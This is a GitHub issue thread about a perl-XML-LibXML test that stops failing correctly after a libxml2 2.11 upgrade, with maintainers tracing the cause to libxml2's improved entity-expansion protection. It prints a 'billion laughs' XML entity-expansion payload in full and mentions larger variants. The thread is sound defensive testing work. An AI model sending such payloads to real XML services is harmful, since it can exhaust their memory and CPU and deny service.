shlomif / perl-XML-LibXML

The XML-LibXML CPAN Distribution for Processing XML using the libxml2 library
https://metacpan.org/release/XML-LibXML
Other
17 stars 35 forks source link

libxml2-2.11 breaks t/35huge_mode.t #79

Closed martinetd closed 1 year ago

martinetd commented 1 year ago

Updating from libxml2 2.10.4 to libxml2 2.11.4 seems to break this test, as of XML-LibXML-2.0208 (also tried master branch out of principle but there wasn't any difference)

t/35huge_mode.t .................................... 1/5
1..5
ok 1 - huge mode disabled by default
not ok 2 - exception thrown during parse
#   Failed test 'exception thrown during parse'
#   at t/35huge_mode.t line 58.
#          got: ''
#     expected: anything else
not ok 3 - exception refers to entity reference loop
#   Failed test 'exception refers to entity reference loop'
#   at t/35huge_mode.t line 60.
#                   ''
#     doesn't match '(?^si:entity.*loop)'
ok 4 - no exception thrown during parse
ok 5 - entity was parsed and expanded correctly
# Looks like you failed 2 tests of 5.

This was reported on Gentoo https://bugs.gentoo.org/show_bug.cgi?id=906095 and NixOS https://github.com/NixOS/nixpkgs/issues/243214

I'm not too familiar with perl, so not quite sure what went wrong here -- $@ is empty when it shouldn't sure but how do you get the exception out of this, if there was one as the message suggests? $doc looks sane enough if I print it:

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

It was easy enough to reproduce so happy to test anything you'd like investigating.

jtojnar commented 1 year ago

I guess this has something to do with the following change in 2.11.0:

Protection against entity expansion attacks, also known as "billion laughs" has been greatly improved. Malicious files should be detected reliably now and false positives should be reduced. It is possible though that large documents which make heavy use of entities are rejected now.

Perhaps this commit: https://gitlab.gnome.org/GNOME/libxml2/-/commit/463bbeeca1805b5c4828f50d0fefc4eebaf620df

Maybe try increasing the number of entities – the current 2⁹ is not a very high number.

martinetd commented 1 year ago

Ah, I finally understand the test; ok. So the "evil" "billion laughs" xml is no longer rejected when it shouldn't be...

Maybe try increasing the number of entities – the current 2⁹ is not a very high number.

hmm, I'll have to be spoonfed how to change that limit sorry; but in this case the parsing worked when it shouldn't have worked so I think it's the other way around -- make the evil_xml worse? although even copying the horrible libxml's test/recurse/lol6.xml that was mentioned didn't do it.. in the same directory lol4 has 2^30 entities and still doesn't raise an exception.

martinetd commented 1 year ago

ah, you probably just meant raising the number of entities in the test.. I went a step further with test/recurse/lol_classic.xml as f master (2^47) and that did the trick. Will send a PR